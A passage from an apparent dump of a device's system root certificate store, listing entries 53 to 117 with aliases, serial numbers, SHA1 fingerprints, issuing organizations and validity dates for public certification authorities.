22d5d8df8f0231d18df79db7cf8a2d64c93f6c3a Issued to: VeriSign Class 3 Public Primary Certification Authority - G4 Organization: VeriSign, Inc. Issued by: VeriSign Class 3 Public Primary Certification Authority - G4 Organization: VeriSign, Inc. Inserted: 31 Dec 2008 Validity: 04 Nov 2007 to 18 Jan 2038 54. TWCA Global Root CA Alias: system:b0ed035a.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: cbe SHA1 Fingerprint: 9cbb4853f6a4f6d352a4e83252556013f5adaf65 Issued to: TWCA Global Root CA Organization: TAIWAN-CA Issued by: TWCA Global Root CA Organization: TAIWAN-CA Inserted: 31 Dec 2008 Validity: 27 Jun 2012 to 31 Dec 2030 55. AffirmTrust Premium Alias: system:dbc54cab.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 6d8c1446b1a60aee SHA1 Fingerprint: d8a6332ce0036fb185f6634f7d6a066526322827 Issued to: AffirmTrust Premium Organization: AffirmTrust Issued by: AffirmTrust Premium Organization: AffirmTrust Inserted: 31 Dec 2008 Validity: 29 Jan 2010 to 31 Dec 2040 56. Atos TrustedRoot 2011 Alias: system:b872f2b4.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 5c33cb622c5fb332 SHA1 Fingerprint: 2bb1f53e550c1dc5f1d4e6b76a464b550602ac21 Issued to: Atos TrustedRoot 2011 Organization: Atos Issued by: Atos TrustedRoot 2011 Organization: Atos Inserted: 31 Dec 2008 Validity: 07 Jul 2011 to 31 Dec 2030 57. null Alias: system:9d6523ce.0 Type: X.509 Entry Type: Certificate Version: 3 Serial Number: 15c8bd65475cafb897005ee406d2bc9d SHA1 Fingerprint: 67650df17e8e7e5b8240a4f4564bcfe23d69c6f0 Issued to: null Organization: Chunghwa Telecom Co., Ltd. Issued by: null Organization: Chunghwa Telecom Co., Ltd. Inserted: 31 Dec 2008 Validity: 19 Dec 2004 to 19 Dec 2034 58. Buypass Class 2 Root CA Alias: system:82223c44.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 2 SHA1 Fingerprint: 490a7574de870a47fe58eef6c76bebc60b124099 Issued to: Buypass Class 2 Root CA Organization: Buypass AS-983163327 Issued by: Buypass Class 2 Root CA Organization: Buypass AS-983163327 Inserted: 31 Dec 2008 Validity: 26 Oct 2010 to 26 Oct 2040 59. D-TRUST Root Class 3 CA 2 2009 Alias: system:1df5a75f.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 983f3 SHA1 Fingerprint: 58e8abb0361533fb80f79b1b6d29d3ff8d5f00f0 Issued to: D-TRUST Root Class 3 CA 2 2009 Organization: D-Trust GmbH Issued by: D-TRUST Root Class 3 CA 2 2009 Organization: D-Trust GmbH Inserted: 31 Dec 2008 Validity: 05 Nov 2009 to 05 Nov 2029 60. Entrust Root Certification Authority - G4 Alias: system:f0cd152c.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: d9b5437fafa9390f000000005565ad58 SHA1 Fingerprint: 14884e862637b026af59625c4077ec3529ba9601 Issued to: Entrust Root Certification Authority - G4 Organization: Entrust, Inc. Issued by: Entrust Root Certification Authority - G4 Organization: Entrust, Inc. Inserted: 31 Dec 2008 Validity: 27 May 2015 to 27 Dec 2037 61. SecureSign RootCA11 Alias: system:ab5346f4.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1 SHA1 Fingerprint: 3bc49f48f8f373a09c1ebdf85bb1c365c7d811b3 Issued to: SecureSign RootCA11 Organization: Japan Certification Services, Inc. Issued by: SecureSign RootCA11 Organization: Japan Certification Services, Inc. Inserted: 31 Dec 2008 Validity: 08 Apr 2009 to 08 Apr 2029 62. GlobalSign Alias: system:2add47b6.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 605949e0262ebb55f90a778a71f94ad86c SHA1 Fingerprint: 1f24c630cda418ef2069ffad4fdd5f463a1b69aa Issued to: GlobalSign Organization: GlobalSign Issued by: GlobalSign Organization: GlobalSign Inserted: 31 Dec 2008 Validity: 12 Nov 2012 to 18 Jan 2038 63. DigiCert Global Root CA Alias: system:399e7759.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 83be056904246b1a1756ac95991c74a SHA1 Fingerprint: a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436 Issued to: DigiCert Global Root CA Organization: DigiCert Inc Issued by: DigiCert Global Root CA Organization: DigiCert Inc Inserted: 31 Dec 2008 Validity: 09 Nov 2006 to 09 Nov 2031 64. IdenTrust Public Sector Root CA 1 Alias: system:4be590e0.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: a0142800000014523cf467c00000002 SHA1 Fingerprint: ba29416077983ff4f3eff231053b2eea6d4d45fd Issued to: IdenTrust Public Sector Root CA 1 Organization: IdenTrust Issued by: IdenTrust Public Sector Root CA 1 Organization: IdenTrust Inserted: 31 Dec 2008 Validity: 16 Jan 2014 to 16 Jan 2034 65. Hellenic Academic and Research Institutions RootCA 2015 Alias: system:dc99f41e.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 0 SHA1 Fingerprint: 010c0695a6981914ffbf5fc6b0b695ea29e912a6 Issued to: Hellenic Academic and Research Institutions RootCA 2015 Organization: Hellenic Academic and Research Institutions Cert. Authority Issued by: Hellenic Academic and Research Institutions RootCA 2015 Organization: Hellenic Academic and Research Institutions Cert. Authority Inserted: 31 Dec 2008 Validity: 07 Jul 2015 to 30 Jun 2040 66. TrustCor ECA-1 Alias: system:c2c1704e.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 84822c5f1c62d040 SHA1 Fingerprint: 58d1df9595676b63c0f05b1c174d8b840bc878bd Issued to: TrustCor ECA-1 Organization: TrustCor Systems S. de R.L. Issued by: TrustCor ECA-1 Organization: TrustCor Systems S. de R.L. Inserted: 31 Dec 2008 Validity: 04 Feb 2016 to 31 Dec 2029 67. XRamp Global Certification Authority Alias: system:76579174.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 50946cec18ead59c4dd597ef758fa0ad SHA1 Fingerprint: b80186d1eb9c86a54104cf3054f34c52b7e558c6 Issued to: XRamp Global Certification Authority Organization: XRamp Security Services Inc Issued by: XRamp Global Certification Authority Organization: XRamp Security Services Inc Inserted: 31 Dec 2008 Validity: 01 Nov 2004 to 01 Jan 2035 68. OISTE WISeKey Global Root GB CA Alias: system:dfc0fe80.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 76b1205274f0858746b3f8231af6c2c0 SHA1 Fingerprint: 0ff9407618d3d76a4b98f0a8359e0cfd27accced Issued to: OISTE WISeKey Global Root GB CA Organization: WISeKey Issued by: OISTE WISeKey Global Root GB CA Organization: WISeKey Inserted: 31 Dec 2008 Validity: 01 Dec 2014 to 01 Dec 2039 69. OISTE WISeKey Global Root GA CA Alias: system:3a3b02ce.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 413d72c7f46b1f81437df1d22854df9a SHA1 Fingerprint: 5922a1e15aea163521f898396a4646b0441b0fa9 Issued to: OISTE WISeKey Global Root GA CA Organization: WISeKey Issued by: OISTE WISeKey Global Root GA CA Organization: WISeKey Inserted: 31 Dec 2008 Validity: 11 Dec 2005 to 11 Dec 2037 70. GlobalSign Alias: system:111e6273.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 400000000010f8626e60d SHA1 Fingerprint: 75e0abb6138512271c04f85fddde38e4b7242efe Issued to: GlobalSign Organization: GlobalSign Issued by: GlobalSign Organization: GlobalSign Inserted: 31 Dec 2008 Validity: 15 Dec 2006 to 15 Dec 2021 71. Sonera Class2 CA Alias: system:a7605362.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1d SHA1 Fingerprint: 37f76de6077c90c5b13e931ab74110b4f2e49a27 Issued to: Sonera Class2 CA Organization: Sonera Issued by: Sonera Class2 CA Organization: Sonera Inserted: 31 Dec 2008 Validity: 06 Apr 2001 to 06 Apr 2021 72. null Alias: system:c51c224c.0 Type: X.509 Entry Type: Certificate Version: 3 Serial Number: 1b1fadb620f924d3366bf7c7f18ca059 SHA1 Fingerprint: 3bc0380b33c3f6a60c86152293d9dff54b81c004 Issued to: null Organization: Trustis Limited Issued by: null Organization: Trustis Limited Inserted: 31 Dec 2008 Validity: 23 Dec 2003 to 21 Jan 2024 73. VeriSign Class 3 Public Primary Certification Authority - G3 Alias: system:7d453d8f.0 Type: X.509 Entry Type: Certificate Version: 1 Serial Number: 9b7e0649a33e62b9d5ee90487129ef57 SHA1 Fingerprint: 132d0d45534b6997cdb2d5c339e25576609b5cc6 Issued to: VeriSign Class 3 Public Primary Certification Authority - G3 Organization: VeriSign, Inc. Issued by: VeriSign Class 3 Public Primary Certification Authority - G3 Organization: VeriSign, Inc. Inserted: 31 Dec 2008 Validity: 30 Sep 1999 to 16 Jul 2036 74. Actalis Authentication Root CA Alias: system:5f47b495.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 570a119742c4e3cc SHA1 Fingerprint: f373b387065a28848af2f34ace192bddc78e9cac Issued to: Actalis Authentication Root CA Organization: Actalis S.p.A./03358520967 Issued by: Actalis Authentication Root CA Organization: Actalis S.p.A./03358520967 Inserted: 31 Dec 2008 Validity: 22 Sep 2011 to 22 Sep 2030 75. Hongkong Post Root CA 3 Alias: system:bd43e1dd.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 8165f8a4ca5ec00c99340dfc4c6ae23b81c5aa4 SHA1 Fingerprint: 58a2d0ec2052815bc1f3f86402244ec28e024b02 Issued to: Hongkong Post Root CA 3 Organization: Hongkong Post Issued by: Hongkong Post Root CA 3 Organization: Hongkong Post Inserted: 31 Dec 2008 Validity: 02 Jun 2017 to 02 Jun 2042 76. GlobalSign Alias: system:1e8e7201.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 4000000000121585308a2 SHA1 Fingerprint: d69b561148f01c77c54578c10926df5b856976ad Issued to: GlobalSign Organization: GlobalSign Issued by: GlobalSign Organization: GlobalSign Inserted: 31 Dec 2008 Validity: 18 Mar 2009 to 18 Mar 2029 77. CA Disig Root R2 Alias: system:9576d26b.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 92b888dbb08ac163 SHA1 Fingerprint: b561ebeaa4dee4254b691a98a55747c234c7d971 Issued to: CA Disig Root R2 Organization: Disig a.s. Issued by: CA Disig Root R2 Organization: Disig a.s. Inserted: 31 Dec 2008 Validity: 19 Jul 2012 to 19 Jul 2042 78. QuoVadis Root CA 2 Alias: system:7a819ef2.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 509 SHA1 Fingerprint: ca3afbcf1240364b44b216208880483919937cf7 Issued to: QuoVadis Root CA 2 Organization: QuoVadis Limited Issued by: QuoVadis Root CA 2 Organization: QuoVadis Limited Inserted: 31 Dec 2008 Validity: 24 Nov 2006 to 24 Nov 2031 79. Entrust.net Certification Authority (2048) Alias: system:3e7271e8.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 3863def8 SHA1 Fingerprint: 503006091d97d4f5ae39f7cbe7927d7d652d3431 Issued to: Entrust.net Certification Authority (2048) Organization: Entrust.net Issued by: Entrust.net Certification Authority (2048) Organization: Entrust.net Inserted: 31 Dec 2008 Validity: 24 Dec 1999 to 24 Jul 2029 80. DigiCert Assured ID Root CA Alias: system:69105f4f.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: ce7e0e517d846fe8fe560fc1bf03039 SHA1 Fingerprint: 0563b8630d62d75abbc8ab1e4bdfb5a899b24d43 Issued to: DigiCert Assured ID Root CA Organization: DigiCert Inc Issued by: DigiCert Assured ID Root CA Organization: DigiCert Inc Inserted: 31 Dec 2008 Validity: 09 Nov 2006 to 09 Nov 2031 81. Certigna Alias: system:fde84897.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: fedce3010fc948ff SHA1 Fingerprint: b12e13634586a46f1ab2606837582dc4acfd9497 Issued to: Certigna Organization: Dhimyotis Issued by: Certigna Organization: Dhimyotis Inserted: 31 Dec 2008 Validity: 29 Jun 2007 to 29 Jun 2027 82. null Alias: system:23f4c490.0 Type: X.509 Entry Type: Certificate Version: 3 Serial Number: 0 SHA1 Fingerprint: ad7e1c28b064ef8f6003402014c3d0e3370eb58a Issued to: null Organization: Starfield Technologies, Inc. Issued by: null Organization: Starfield Technologies, Inc. Inserted: 31 Dec 2008 Validity: 29 Jun 2004 to 29 Jun 2034 83. GeoTrust Primary Certification Authority Alias: system:9772ca32.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 18acb56afd69b6153a636cafdafac4a1 SHA1 Fingerprint: 323c118e1bf7b8b65254e2e2100dd6029037f096 Issued to: GeoTrust Primary Certification Authority Organization: GeoTrust Inc. Issued by: GeoTrust Primary Certification Authority Organization: GeoTrust Inc. Inserted: 31 Dec 2008 Validity: 26 Nov 2006 to 16 Jul 2036 84. null Alias: system:a3896b44.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 0 SHA1 Fingerprint: 36b12b49f9819ed74c9ebc380fc6568f5dacb2f7 Issued to: null Organization: SECOM Trust.net Issued by: null Organization: SECOM Trust.net Inserted: 31 Dec 2008 Validity: 30 Sep 2003 to 30 Sep 2023 85. TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1 Alias: system:31188b5e.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1 SHA1 Fingerprint: 3143649becce27eced3a3f0b8f0de4e891ddeeca Issued to: TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1 Organization: Turkiye Bilimsel ve Teknolojik Arastirma Kurumu - TUBITAK Issued by: TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1 Organization: Turkiye Bilimsel ve Teknolojik Arastirma Kurumu - TUBITAK Inserted: 31 Dec 2008 Validity: 25 Nov 2013 to 25 Oct 2043 86. GlobalSign Alias: system:0d69c7e1.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 2a38a41c960a04de42b228a50be8349802 SHA1 Fingerprint: 6969562e4080f424a1e7199f14baf3ee58ab6abb Issued to: GlobalSign Organization: GlobalSign Issued by: GlobalSign Organization: GlobalSign Inserted: 31 Dec 2008 Validity: 12 Nov 2012 to 18 Jan 2038 87. TrustCor RootCert CA-1 Alias: system:7c302982.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: da9bec71f303b019 SHA1 Fingerprint: ffbdcde782c8435e3c6f26865ccaa83a455bc30a Issued to: TrustCor RootCert CA-1 Organization: TrustCor Systems S. de R.L. Issued by: TrustCor RootCert CA-1 Organization: TrustCor Systems S. de R.L. Inserted: 31 Dec 2008 Validity: 04 Feb 2016 to 31 Dec 2029 88. Autoridad de Certificacion Firmaprofesional CIF A62634068 Alias: system:d16a5865.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 53ec3beefbb2485f SHA1 Fingerprint: aec5fb3fc8e1bfc4e54f03075a9ae800b7f7b6fa Issued to: Autoridad de Certificacion Firmaprofesional CIF A62634068 Organization: null Issued by: Autoridad de Certificacion Firmaprofesional CIF A62634068 Organization: null Inserted: 31 Dec 2008 Validity: 20 May 2009 to 31 Dec 2030 89. GeoTrust Primary Certification Authority - G3 Alias: system:c7e2a638.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 15ac6e9419b2794b41f627a9c3180f1f SHA1 Fingerprint: 039eedb80be7a03c6953893b20d2d9323a4c2afd Issued to: GeoTrust Primary Certification Authority - G3 Organization: GeoTrust Inc. Issued by: GeoTrust Primary Certification Authority - G3 Organization: GeoTrust Inc. Inserted: 31 Dec 2008 Validity: 01 Apr 2008 to 01 Dec 2037 90. DigiCert Global Root G2 Alias: system:c90bc37d.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 33af1e6a711a9a0bb2864b11d09fae5 SHA1 Fingerprint: df3c24f9bfd666761b268073fe06d1cc8d4f82a4 Issued to: DigiCert Global Root G2 Organization: DigiCert Inc Issued by: DigiCert Global Root G2 Organization: DigiCert Inc Inserted: 31 Dec 2008 Validity: 01 Aug 2013 to 15 Jan 2038 91. SSL.com Root Certification Authority ECC Alias: system:88950faa.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 75e6dfcbc1685ba8 SHA1 Fingerprint: c3197c3924e654af1bc4ab20957ae2c30e13026a Issued to: SSL.com Root Certification Authority ECC Organization: SSL Corporation Issued by: SSL.com Root Certification Authority ECC Organization: SSL Corporation Inserted: 31 Dec 2008 Validity: 12 Feb 2016 to 12 Feb 2041 92. VeriSign Class 3 Public Primary Certification Authority - G5 Alias: system:facacbc6.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 18dad19e267de8bb4a2158cdcc6b3b4a SHA1 Fingerprint: 4eb6d578499b1ccf5f581ead56be3d9b6744a5e5 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Organization: VeriSign, Inc. Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Organization: VeriSign, Inc. Inserted: 31 Dec 2008 Validity: 07 Nov 2006 to 16 Jul 2036 93. AffirmTrust Premium ECC Alias: system:ccc52f49.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 7497258ac73f7a54 SHA1 Fingerprint: b8236b002f1d16865301556c11a437caebffc3bb Issued to: AffirmTrust Premium ECC Organization: AffirmTrust Issued by: AffirmTrust Premium ECC Organization: AffirmTrust Inserted: 31 Dec 2008 Validity: 29 Jan 2010 to 31 Dec 2040 94. null Alias: system:b936d1c6.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 5d938d306736c8061d1ac754846907 SHA1 Fingerprint: ec503507b215c4956219e2a89a5b42992c4c2c20 Issued to: null Organization: FNMT-RCM Issued by: null Organization: FNMT-RCM Inserted: 31 Dec 2008 Validity: 29 Oct 2008 to 31 Dec 2029 95. IdenTrust Commercial Root CA 1 Alias: system:d18e9066.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: a0142800000014523c844b500000002 SHA1 Fingerprint: df717eaa4ad94ec9558499602d48de5fbcf03a25 Issued to: IdenTrust Commercial Root CA 1 Organization: IdenTrust Issued by: IdenTrust Commercial Root CA 1 Organization: IdenTrust Inserted: 31 Dec 2008 Validity: 16 Jan 2014 to 16 Jan 2034 96. AddTrust External CA Root Alias: system:3c58f906.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1 SHA1 Fingerprint: 02faf3e291435468607857694df5e45b68851868 Issued to: AddTrust External CA Root Organization: AddTrust AB Issued by: AddTrust External CA Root Organization: AddTrust AB Inserted: 31 Dec 2008 Validity: 30 May 2000 to 30 May 2020 97. Entrust Root Certification Authority - G2 Alias: system:455f1b52.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 4a538c28 SHA1 Fingerprint: 8cf427fd790c3ad166068de81e57efbb932272d4 Issued to: Entrust Root Certification Authority - G2 Organization: Entrust, Inc. Issued by: Entrust Root Certification Authority - G2 Organization: Entrust, Inc. Inserted: 31 Dec 2008 Validity: 07 Jul 2009 to 07 Dec 2030 98. E-Tugra Certification Authority Alias: system:cb156124.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 6a683e9c519bcb53 SHA1 Fingerprint: 51c6e70849066ef392d45ca00d6da3628fc35239 Issued to: E-Tugra Certification Authority Organization: E-Tuğra EBG Bilişim Teknolojileri ve Hizmetleri A.Ş. Issued by: E-Tugra Certification Authority Organization: E-Tuğra EBG Bilişim Teknolojileri ve Hizmetleri A.Ş. Inserted: 31 Dec 2008 Validity: 05 Mar 2013 to 03 Mar 2023 99. null Alias: system:d59297b8.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 0 SHA1 Fingerprint: 5f3b8cf2f810b37d78b4ceec1919c37334b9c774 Issued to: null Organization: SECOM Trust Systems CO.,LTD. Issued by: null Organization: SECOM Trust Systems CO.,LTD. Inserted: 31 Dec 2008 Validity: 29 May 2009 to 29 May 2029 100. COMODO Certification Authority Alias: system:5a3f0ff8.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 4e812d8a8265e00b02ee3e350246e53d SHA1 Fingerprint: 6631bf9ef74f9eb6c9d5a60cba6abed1f7bdef7b Issued to: COMODO Certification Authority Organization: COMODO CA Limited Issued by: COMODO Certification Authority Organization: COMODO CA Limited Inserted: 31 Dec 2008 Validity: 30 Nov 2006 to 31 Dec 2029 101. VeriSign Universal Root Certification Authority Alias: system:524d9b43.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 401ac46421b31321030ebbe4121ac51d SHA1 Fingerprint: 3679ca35668772304d30a5fb873b0fa77bb70d54 Issued to: VeriSign Universal Root Certification Authority Organization: VeriSign, Inc. Issued by: VeriSign Universal Root Certification Authority Organization: VeriSign, Inc. Inserted: 31 Dec 2008 Validity: 01 Apr 2008 to 01 Dec 2037 102. Global Chambersign Root - 2008 Alias: system:9f533518.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: c9cdd3e9d57d23ce SHA1 Fingerprint: 4abdeeec950d359c89aec752a12c5b29f6d6aa0c Issued to: Global Chambersign Root - 2008 Organization: AC Camerfirma S.A. Issued by: Global Chambersign Root - 2008 Organization: AC Camerfirma S.A. Inserted: 31 Dec 2008 Validity: 01 Aug 2008 to 31 Jul 2038 103. AffirmTrust Commercial Alias: system:e48193cf.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 7777062726a9b17c SHA1 Fingerprint: f9b5b632455f9cbeec575f80dce96e2cc7b278b7 Issued to: AffirmTrust Commercial Organization: AffirmTrust Issued by: AffirmTrust Commercial Organization: AffirmTrust Inserted: 31 Dec 2008 Validity: 29 Jan 2010 to 31 Dec 2030 104. DigiCert Assured ID Root G3 Alias: system:c491639e.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: ba15afa1ddfa0b54944afcd24a06cec SHA1 Fingerprint: f517a24f9a48c6c9f8a200269fdc0f482cab3089 Issued to: DigiCert Assured ID Root G3 Organization: DigiCert Inc Issued by: DigiCert Assured ID Root G3 Organization: DigiCert Inc Inserted: 31 Dec 2008 Validity: 01 Aug 2013 to 15 Jan 2038 105. NetLock Arany (Class Gold) Főtanúsítvány Alias: system:60afe812.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 49412ce40010 SHA1 Fingerprint: 06083f593f15a104a069a46ba903d006b7970991 Issued to: NetLock Arany (Class Gold) Főtanúsítvány Organization: NetLock Kft. Issued by: NetLock Arany (Class Gold) Főtanúsítvány Organization: NetLock Kft. Inserted: 31 Dec 2008 Validity: 11 Dec 2008 to 06 Dec 2028 106. QuoVadis Root CA 2 G3 Alias: system:1f58a078.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 445734245b81899b35f2ceb82b3b5ba726f07528 SHA1 Fingerprint: 093c61f38b8bdc7d55df7538020500e125f5c836 Issued to: QuoVadis Root CA 2 G3 Organization: QuoVadis Limited Issued by: QuoVadis Root CA 2 G3 Organization: QuoVadis Limited Inserted: 31 Dec 2008 Validity: 12 Jan 2012 to 12 Jan 2042 107. Starfield Root Certificate Authority - G2 Alias: system:85cde254.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 0 SHA1 Fingerprint: b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e Issued to: Starfield Root Certificate Authority - G2 Organization: Starfield Technologies, Inc. Issued by: Starfield Root Certificate Authority - G2 Organization: Starfield Technologies, Inc. Inserted: 31 Dec 2008 Validity: 31 Aug 2009 to 31 Dec 2037 108. Hellenic Academic and Research Institutions ECC RootCA 2015 Alias: system:9479c8c3.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 0 SHA1 Fingerprint: 9ff1718d92d59af37d7497b4bc6f84680bbab666 Issued to: Hellenic Academic and Research Institutions ECC RootCA 2015 Organization: Hellenic Academic and Research Institutions Cert. Authority Issued by: Hellenic Academic and Research Institutions ECC RootCA 2015 Organization: Hellenic Academic and Research Institutions Cert. Authority Inserted: 31 Dec 2008 Validity: 07 Jul 2015 to 30 Jun 2040 109. TrustCor RootCert CA-2 Alias: system:d0cddf45.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 25a1dfca33cb5902 SHA1 Fingerprint: b8be6dcb56f155b963d412ca4e0634c794b21cc0 Issued to: TrustCor RootCert CA-2 Organization: TrustCor Systems S. de R.L. Issued by: TrustCor RootCert CA-2 Organization: TrustCor Systems S. de R.L. Inserted: 31 Dec 2008 Validity: 04 Feb 2016 to 31 Dec 2034 110. null Alias: system:219d9499.0 Type: X.509 Entry Type: Certificate Version: 3 Serial Number: 0 SHA1 Fingerprint: 2796bae63f1801e277261ba0d77770028f20eee4 Issued to: null Organization: The Go Daddy Group, Inc. Issued by: null Organization: The Go Daddy Group, Inc. Inserted: 31 Dec 2008 Validity: 29 Jun 2004 to 29 Jun 2034 111. Izenpe.com Alias: system:48a195d8.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: b0b75a16485fbfe1cbf58bd719e67d SHA1 Fingerprint: 2f783d255218a74a653971b52ca29c45156fe919 Issued to: Izenpe.com Organization: IZENPE S.A. Issued by: Izenpe.com Organization: IZENPE S.A. Inserted: 31 Dec 2008 Validity: 13 Dec 2007 to 13 Dec 2037 112. Certigna Root CA Alias: system:302904dd.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: cae91b89f155030da3e6416dc4e3a6e1 SHA1 Fingerprint: 2d0d5214ff9ead9924017420476e6c852727f543 Issued to: Certigna Root CA Organization: Dhimyotis Issued by: Certigna Root CA Organization: Dhimyotis Inserted: 31 Dec 2008 Validity: 01 Oct 2013 to 01 Oct 2033 113. DigiCert High Assurance EV Root CA Alias: system:81b9768f.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 2ac5c266a0b409b8f0b79f2ae462577 SHA1 Fingerprint: 5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25 Issued to: DigiCert High Assurance EV Root CA Organization: DigiCert Inc Issued by: DigiCert High Assurance EV Root CA Organization: DigiCert Inc Inserted: 31 Dec 2008 Validity: 09 Nov 2006 to 09 Nov 2031 114. Network Solutions Certificate Authority Alias: system:2fa87019.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 57cb336fc25c16e6471617e3903168e0 SHA1 Fingerprint: 74f8a3c3efe7b390064b83903c21646020e5dfce Issued to: Network Solutions Certificate Authority Organization: Network Solutions L.L.C. Issued by: Network Solutions Certificate Authority Organization: Network Solutions L.L.C. Inserted: 31 Dec 2008 Validity: 30 Nov 2006 to 31 Dec 2029 115. EC-ACC Alias: system:aeb67534.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: -11d4c2142bde21eb579d53fb0c223bff SHA1 Fingerprint: 28903a635b5280fae6774c0b6da7d6baa64af2e8 Issued to: EC-ACC Organization: Agencia Catalana de Certificacio (NIF Q-0801176-I) Issued by: EC-ACC Organization: Agencia Catalana de Certificacio (NIF Q-0801176-I) Inserted: 31 Dec 2008 Validity: 07 Jan 2003 to 07 Jan 2031 116. Hellenic Academic and Research Institutions RootCA 2011 Alias: system:40dc992e.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 0 SHA1 Fingerprint: fe45659b79035b98a161b5512eacda580948224d Issued to: Hellenic Academic and Research Institutions RootCA 2011 Organization: Hellenic Academic and Research Institutions Cert. Authority Issued by: Hellenic Academic and Research Institutions RootCA 2011 Organization: Hellenic Academic and Research Institutions Cert. Authority Inserted: 31 Dec 2008 Validity: 06 Dec 2011 to 01 Dec 2031 117. SZAFIR ROOT CA2 Alias: system:a81e292b.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing 